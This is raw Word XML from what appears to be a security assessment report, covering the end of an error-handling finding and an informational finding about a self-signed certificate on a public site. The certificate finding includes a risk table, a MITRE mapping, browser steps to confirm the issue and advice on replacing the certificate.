    <w:p w:rsidR="6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="66ABAA8C" w14:textId="5D97AFA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>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Disable debug mode to prevent the leakage of diagnostic information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="1CF87696" w14:textId="07B27903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:num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Audit the </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applications</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> error handling regularly and keep all software components up to date.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="783DB509" w14:textId="2FCEE81A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing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w:rsidR="6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="781E6D3F" w14:textId="1FA904F8">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AE352A">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6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="1FB33A49" w14:textId="20F1D0F3">
      <w:pPr>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5b073ca8ade642c5">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Improper Error Handling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6FAE352A" w:rsidP="0D325B6E" w:rsidRDefault="6FAE352A" w14:paraId="4E62BC4F" w14:textId="5217183F">
      <w:pPr>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e6a333488c9f4d54">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="6FAE352A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PortSwigger - Information disclosure vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5DDDE12B" w14:textId="5AC7677A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="64B10FF7" w14:textId="0C8C66A4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="248FB76F" w:rsidP="0D325B6E" w:rsidRDefault="248FB76F" w14:paraId="593CDFD3" w14:textId="327ABEEB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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D325B6E" w:rsidR="248FB76F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="152B0A1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I1: Self-Signed </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="32191AF5">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HTTP Certificate on Public Site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606"/>
        <w:gridCol w:w="1650"/>
        <w:gridCol w:w="2386"/>
        <w:gridCol w:w="4365"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="08026F46">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256"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0484C948" w14:textId="3B6B8666">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Matrix Calculation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238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0E4E4A3" w14:textId="248E2249">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 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436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845380A" w14:textId="3BE26A8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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="01464CB1">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160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B4D8E4B" w14:textId="55449E5F">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Impact</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179F5AAC" w14:textId="79F3FA1C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Informationa</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="2923AB66">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238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1C00F656" w14:textId="2AF23E9D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436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6FA8DC"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="00F3C692" w14:textId="5787AFE6">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="38"/>
                <w:szCs w:val="38"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="38"/>
                <w:szCs w:val="38"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="333779B2">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160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122FD59B" w14:textId="12298844">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Likelihood</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0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1338BBA1" w14:textId="07A7819E">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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74D7588C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="084361D9"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="673CA52C">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256"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33E370A4" w14:textId="256F4A7E">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CVSSv4.0 Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6751"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6260D654" w14:textId="32C935BB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="096C3341">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160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699C881D" w14:textId="206E2B08">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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>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88863DF" w14:textId="3C5DE3CF">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Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6751"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6D89E23" w:rsidP="0D325B6E" w:rsidRDefault="36D89E23" w14:paraId="5D390BDB" w14:textId="6083B69D">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strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re71210a7aea24c2f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="36D89E23">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1587.003: Develop Capabilities - Digital Certificates</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="04966BF3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1606" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F748A07"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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7A033486" w14:textId="4C88E04E">
            <w:pPr>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Mitigations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6751"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0DCB81A" w:rsidP="0D325B6E" w:rsidRDefault="30DCB81A" w14:paraId="6280A334" w14:textId="21488806">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R99882894e8fc4df9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="30DCB81A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1056: Pre-compromise</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="08D43AD5">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256"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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="42F39017" w14:textId="7AB28C25">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Affected Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6751"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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="41D2E9F9" w14:textId="1644FC8C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="112CF705" w14:textId="60EE5FEC">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w:rsidR="45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="1F30DFE2" w14:textId="2726F0A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45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="652DD1EA" w14:textId="7F30B6A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The web application on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="45317EB5">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uses a self-signed certificate. Self-signing certificates for public applications is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generally not</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recommended due to the increased possibility of error and the lack of browser trust due to not being a certificate authority. Also, if an attacker happens to find the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certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6B8076D9">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private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key,</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they can forge,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modify</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DB660BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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and decrypt network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="32F0CB47" w14:textId="29751C1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5317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="4CBFD4D1" w14:textId="6177C884">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r w:rsidRPr="0D325B6E" w:rsidR="45317EB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6F31E813" w:rsidP="0D325B6E" w:rsidRDefault="6F31E813" w14:paraId="0BAA4252" w14:textId="48147845">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6F31E813">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At its worst, using self-signed certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="435FD4B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can enable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attackers to perform adversary-in-the-middle attacks to steal client data, which can lead to fines and a loss of public reputation. Clients may also be unwilling to use ATP websites that have a self-si</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gned </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_byoszga7" w:id="624337878"/>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certif</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icate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="624337878"/>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warn</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ing,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impa</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ctin</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g</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bus</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i</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ness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opera</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t</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ions</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and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s</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ale</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s.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="70C8D3BE" w14:textId="443F8E85">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="235B045A" w14:textId="06664504">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45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="0954B610" w14:textId="1E4EDA1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Step 1: Navigate to the website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="0036D49F" w14:textId="74CF691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Step 2: Click on the padlock icon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="37DA6720" w14:textId="252C387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Step 3: Go to ‘Connection is secure’ and </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observe</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that the certificate is self-signed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D51FF73" w14:textId="1B353100">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="7FF74C33" w14:textId="1296BE62">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45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="6385183E" w14:textId="5DCE3FD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5317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="52EC1091" w14:textId="609B34F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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Generate a valid certificate, either through a third-party certificate authority, or a self-hosted certificate trusted by the APT organization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="41D1FE04" w14:textId="12058DD4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Replace the self-signed certificate with this certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7A735867" w14:textId="0F6621D1">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45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="5428D54A" w14:textId="507EB88C">
      <w:pPr>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D325B6E" w:rsidR="45317EB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45317EB5" w:rsidP="0D325B6E" w:rsidRDefault="45317EB5" w14:paraId="107AD608" w14:textId="454DBC26">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R6ad1f4d5e72a4524">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="45317EB5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Cloudflare - What is an SSL Certificate</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7576FF66" w14:textId="734D84E3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="45FCC850" w14:textId="75A3AD73">
